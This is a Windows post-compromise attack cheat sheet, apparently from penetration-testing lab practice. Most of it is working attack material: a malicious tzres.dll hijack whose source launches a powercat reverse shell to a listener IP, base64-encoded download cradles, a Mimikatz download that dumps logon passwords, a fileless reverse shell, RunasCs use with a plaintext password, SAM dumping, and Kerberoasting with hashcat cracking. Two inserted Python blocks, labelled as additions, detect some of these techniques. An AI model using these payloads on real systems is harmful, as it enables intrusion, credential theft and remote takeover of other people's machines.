Post Compromise
There are several key pieces of information we should always obtain:
- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes
Display network and process info
route print
netstat -ano
powershell -command "Get-Process"
tasklist
Check installed applications
# 32 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# 64 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Display Application Details
powershell.exe -command "Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'"
Searching for interesting files
#Search for .kdbx files
powershell -command "Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue"
#Search for txt , ini files
powershell -command "Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.log -File -Recurse -ErrorAction SilentlyContinue"
#Search for .txt, .pdf, .xls, .xlsx, .doc, .docx
powershell -command "Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue"
Checking History
Get-History
type (Get-PSReadlineOption).HistorySavePath
# ConsoleHost_history.txt: find the path where it is saved (default locations below)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Get DPAPI Master Key
Get-ChildItem C:\Users\dave\AppData\Roaming\Microsoft\Protect\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 4/1/2024 7:55 AM S-1-5-21-2309961351-4093026482-2223492918-1002
Get-ChildItem -Hidden C:\Users\dave\AppData\Roaming\Microsoft\Protect\S-1-5-21-2309961351-4093026482-2223492918-1002
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 11/8/2022 7:36 AM 468 1a65c284-d429-4e6b-b7ab-5fc1a2d95636
-a-hs- 4/1/2024 7:55 AM 468 3ff87438-3511-45ac-91ff-611a4521838f
-a-hs- 2/10/2023 5:28 AM 468 7ba528f7-4e73-48a3-8a67-e5680688c9ff
-a-hs- 6/15/2022 7:48 PM 468 d713cea3-8216-4125-b4eb-26f1b4b313e7
-a-hs- 4/1/2024 7:55 AM 24 Preferred
Dumping the SAM and SYSTEM hives locally
impacket-secretsdump LOCAL -sam SAM -system SYSTEM
DLL Hijacking (if we have write access to the System32 folder but cannot get a shell)
tzres.dll
Generate a custom DLL and locate it at C:\Windows\System32\tzres.dll
# install the cross-compiler first if the build below fails
sudo apt-get install mingw-w64
x86_64-w64-mingw32-gcc rev.cpp --shared -o tzres.dll
rev.cpp
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,            // Handle to DLL module
    DWORD  ul_reason_for_call, // Reason for calling function
    LPVOID lpReserved )        // Reserved
{
    switch ( ul_reason_for_call )
    {
    case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        system ("powershell -w hidden -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell");
        break;
    case DLL_THREAD_ATTACH:  // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:  // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}
1.1 Additional (encoding the reverse shell)
echo "IEX (New-Object Net.webclient).downloadString('http://192.168.45.211:80/ps.ps1')" | iconv -t utf-16le | base64 -w 0; echo
powershell -ep bypass -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAxADoAOAAwAC8AcABzAC4AcABzADEAJwApAAoA
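From the defender's side, both the plain powercat cradle in the tzres.dll example and the -enc variant above end up as a process-creation command line (Sysmon EventID 1 or Security 4688). The following is an added example, not part of these notes: it decodes the -EncodedCommand argument (base64 of UTF-16LE text) and flags download-cradle markers in the effective command. The sample command lines are constructed; the -enc payload is the one shown above.

```python
import base64
import binascii

# Constructed process-creation command lines: the -enc payload from the notes,
# the plain powercat cradle from the tzres.dll example, and a benign command.
SAMPLE_COMMAND_LINES = [
    "powershell -ep bypass -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAxADoAOAAwAC8AcABzAC4AcABzADEAJwApAAoA",
    "powershell -w hidden -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell",
    'powershell.exe -NoProfile -Command "Get-Process"',
]

# Substrings that mark a download cradle or in-memory execution once the
# command line is decoded. A simple heuristic; tune to the environment.
CRADLE_MARKERS = ("downloadstring", "downloadfile", "net.webclient",
                  "iex", "invoke-expression", "powercat")


def is_enc_flag(token):
    """powershell.exe accepts short forms of -EncodedCommand (-e, -ec, -enc, ...)."""
    t = token.lower()
    return len(t) >= 2 and "-encodedcommand".startswith(t)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None.

    A flag whose following token is not valid base64 (e.g. powercat's own
    "-e powershell") is skipped rather than treated as an encoded command.
    """
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if not is_enc_flag(flag):
            continue
        try:
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue
    return None


def flag_command_line(cmdline):
    """Return (decoded payload or None, list of cradle markers found)."""
    decoded = decode_encoded_command(cmdline)
    effective = (decoded if decoded is not None else cmdline).lower()
    return decoded, [m for m in CRADLE_MARKERS if m in effective]


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        decoded, hits = flag_command_line(line)
        print("ALERT" if hits else "ok   ", hits, repr(decoded)[:60])
```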
Open listener
sudo rlwrap nc -nlvp 17788
Attain SYSTEM shell access.
Printconfig.dll
Generate a custom DLL and locate it at C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.
Instantiate the PrintNotify COM object by executing the following PowerShell commands:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
Attain SYSTEM shell access.
wpcoreutil.dll
phoneinfo.dll
dxgi.dll
wlbsctrl.dll
wbecomn.dll
ualapi.dll
Mimikatz
(New-Object System.Net.WebClient).DownloadFile('http://192.168.45.206/mimikatz.exe', 'm.exe');
.\m.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" > mout.txt
Fileless Reverse Shell
powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell
Double reverse shell (RunasCs is also available as an exe)
iex(new-object net.webclient).downloadString('http://192.168.45.160/Invoke-RunasCs.ps1'); import-module ./Invoke-RunasCs.ps1;Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/powercat.ps1'); powercat -c 192.168.45.160 -p 17676 -e powershell"
# Make sure both scripts are actually fetched from the web server (check the access log)
python3 -m http.server 80
192.168.249.187 - - [11/May/2024 15:14:01] "GET /Invoke-RunasCs.ps1 HTTP/1.1" 200 -
192.168.249.187 - - [11/May/2024 15:14:01] "GET /powercat.ps1 HTTP/1.1" 200 -
Local Get-SPN.ps1
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.211/Get-SPN.ps1','C:\Users\Public\Get-SPN.ps1'); ./Get-SPN.ps1
# Request a service ticket for the svc_mssql SPN
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'
wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
# Extract the ticket in Hashcat format
iex(new-object net.webclient).downloadString('http://192.168.49.211:80/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat Hashcat
Copy and paste the hash into a file (here svc_mssql.kerberoast), removing every space and newline first.
Cracking the hash with hashcat
hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt
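A defender-side check for the Kerberoast step above, added here and not part of these notes: hashcat mode 13100 cracks RC4-HMAC (etype 0x17) service tickets, so TGS requests (Security event 4769) with that encryption type for user-style service accounts are the signal to watch, and grouping them by requesting account shows one user collecting tickets for many services. The event records and their values are constructed; field names follow the 4769 event XML.

```python
from collections import defaultdict

# Constructed Security event 4769 records (Kerberos service ticket requested),
# modelled on the svc_mssql ticket request shown above. Not real log data.
SAMPLE_4769_EVENTS = [
    {"TargetUserName": "dave@ACCESS.OFFSEC", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "192.168.249.187"},
    {"TargetUserName": "dave@ACCESS.OFFSEC", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "192.168.249.187"},
    {"TargetUserName": "dave@ACCESS.OFFSEC", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "192.168.249.187"},
    {"TargetUserName": "dave@ACCESS.OFFSEC", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "192.168.249.187"},
    {"TargetUserName": "alice@ACCESS.OFFSEC", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "192.168.249.50"},
]

RC4_HMAC = "0x17"  # etype 23; the $krb5tgs$23$ hashes that hashcat -m 13100 cracks


def is_roastable_request(ev):
    """True for a successful RC4 service-ticket request aimed at a user-style account.

    Machine accounts (name ends in $) have long random passwords and krbtgt
    is the TGT service, so neither is a realistic cracking target.
    """
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and ev["Status"] == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def find_kerberoast_requests(events):
    """Group RC4 service-ticket requests by requesting account: {account: [services]}."""
    by_account = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_account[ev["TargetUserName"]].append(ev["ServiceName"])
    return dict(by_account)


def accounts_over_threshold(events, min_services=2):
    """Accounts that requested RC4 tickets for at least min_services distinct services."""
    grouped = find_kerberoast_requests(events)
    return sorted(a for a, s in grouped.items() if len(set(s)) >= min_services)


if __name__ == "__main__":
    print(find_kerberoast_requests(SAMPLE_4769_EVENTS))
    print("review:", accounts_over_threshold(SAMPLE_4769_EVENTS))
```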